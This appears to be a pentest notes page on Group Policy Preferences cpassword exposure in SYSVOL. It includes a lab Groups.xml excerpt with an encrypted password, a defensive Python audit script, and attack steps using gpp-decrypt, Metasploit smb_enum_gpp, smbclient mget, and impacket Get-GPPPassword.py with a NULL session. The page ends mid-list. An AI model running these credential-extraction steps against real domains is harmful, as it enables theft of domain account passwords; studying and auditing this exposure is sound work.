<aside> ℹ️ Group Policy Preferences is a collection of Group Policy client-side extensions that deliver preference settings to domain-joined computers running Microsoft Windows desktop and server operating systems.
</aside>
GPP gives administrators advanced capabilities for configuring and managing account policy in a Windows domain network.
These preferences let them create or modify local accounts and embed credentials for tasks that would otherwise need a password hard-coded in a script. When a new Group Policy Preference (GPP) is created, an XML file (typically Groups.xml) containing the configuration data, including any password associated with the GPP, is written to the SYSVOL share, a set of folders on the domain controllers that every authenticated domain user can read.
For protection, Microsoft encrypts the password with AES before storing it in the "cPassword" attribute, but the AES key was published on MSDN, so anyone who can read the file can decrypt the value.
The Domain Group Policies are stored at:
\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\
cat Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
D9BDE98BA1D1}" name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1"
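The defender-side counterpart to the excerpt above is an audit of the Policies tree for preferences that still carry a cpassword. The following Python script is an added example, not code from the original page or from any of the tools it mentions. It assumes the documented GPP XML layout (file names such as Groups.xml or ScheduledTasks.xml under a Preferences folder, a cpassword attribute on the Properties element, and userName/accountName/runAs attributes naming the account); the sample Groups.xml embedded in it is constructed for the demo and is modelled on the structure shown above, with a meaningless base64 blob in place of a real cpassword.

```python
"""Added example (not from the original page): audit GPP XML files under
SYSVOL for embedded cpassword attributes so they can be removed.

Assumptions: the file names and attribute names below follow the documented
Group Policy Preferences XML layout; the sample XML is constructed for the
demo and does not come from a real domain."""
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP preference files that can carry a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}

# Attributes a GPP element uses to name the account the password belongs to.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")

# Constructed sample modelled on the Groups.xml layout shown on the page.
# Only the first <User> still carries a cpassword; the second was cleaned up.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="EXAMPLE\\svc_backup"
        image="2" changed="2024-01-01 00:00:00"
        uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description=""
        cpassword="Q09OU1RSVUNURURfU0FNUExFX0JMT0I=" changeLogon="0" noChange="1"
        neverExpires="1" acctDisabled="0" userName="EXAMPLE\\svc_backup"/>
  </User>
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="EXAMPLE\\localadmin"
        image="2" changed="2024-01-01 00:00:00"
        uid="{00000000-0000-0000-0000-000000000002}">
    <Properties action="U" newName="" fullName="" description="" cpassword=""
        changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
        userName="EXAMPLE\\localadmin"/>
  </User>
</Groups>
"""


def find_cpasswords_in_xml(xml_text, source="<string>"):
    """Return one finding per element whose cpassword attribute is non-empty.

    Each finding records where it was found, the account it applies to and
    the policy's last-changed timestamp, but never the cpassword itself:
    the output is a remediation list, not a credential dump.
    """
    findings = []
    root = ET.fromstring(xml_text)
    for parent in root.iter():
        for child in parent:
            if not child.attrib.get("cpassword"):   # missing or "" -> already cleared
                continue
            account = next((child.attrib[a] for a in ACCOUNT_ATTRS if child.attrib.get(a)),
                           parent.attrib.get("name", "<unknown>"))
            findings.append({
                "source": source,
                "element": parent.tag,
                "account": account,
                "changed": parent.attrib.get("changed", "<unknown>"),
            })
    return findings


def scan_sysvol(policies_dir):
    """Walk a local copy of the Policies folder and audit every GPP file in it."""
    findings = []
    for path in Path(policies_dir).rglob("*.xml"):
        if path.name not in GPP_FILES or "Preferences" not in path.parts:
            continue
        try:
            text = path.read_text(encoding="utf-8-sig")   # GPP files often carry a BOM
            findings.extend(find_cpasswords_in_xml(text, str(path)))
        except ET.ParseError as exc:
            print(f"skipping unparsable {path}: {exc}", file=sys.stderr)
    return findings


def format_report(findings):
    """Render findings as lines an admin can act on: delete the preference, rotate the account."""
    if not findings:
        return ["no cpassword attributes found"]
    return [f"{f['source']}: <{f['element']}> for {f['account']} "
            f"(changed {f['changed']}) still stores a cpassword"
            for f in findings]


if __name__ == "__main__":
    # Usage: python gpp_audit.py <path-to-copy-of-Policies>; with no argument the
    # constructed sample is audited instead.
    if len(sys.argv) > 1:
        results = scan_sysvol(sys.argv[1])
    else:
        results = find_cpasswords_in_xml(SAMPLE_GROUPS_XML, "Groups.xml")
    print("\n".join(format_report(results)))
```

Run it against a copy of the Policies folder and every hit is a preference to delete and an account whose password should be rotated. The audit is still worthwhile on patched domains: the MS14-025 update stopped the Group Policy editor from writing new cpassword values, but it did not remove the ones already sitting in SYSVOL.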
Kali Linux ships a tool called gpp-decrypt that decrypts a cpassword value:
Alternatively, if we already have credentials, we can use the Metasploit module smb_enum_gpp.
If we are allowed to connect to the share as guest, we can copy the files from SYSVOL, find the cpassword value in them and pass it to gpp-decrypt (in smbclient, run recurse ON and prompt OFF before mget * so it pulls the whole directory tree without asking for each file):
smbclient \\\\ip_address\\share
mget *
impacket includes a script, Get-GPPPassword.py, that searches SYSVOL and dumps the password.
With a NULL session:
Get-GPPPassword.py -no-pass -dc-ip <DOMAIN.CONTROLLER.IP.ADDRESS>
With cleartext credentials: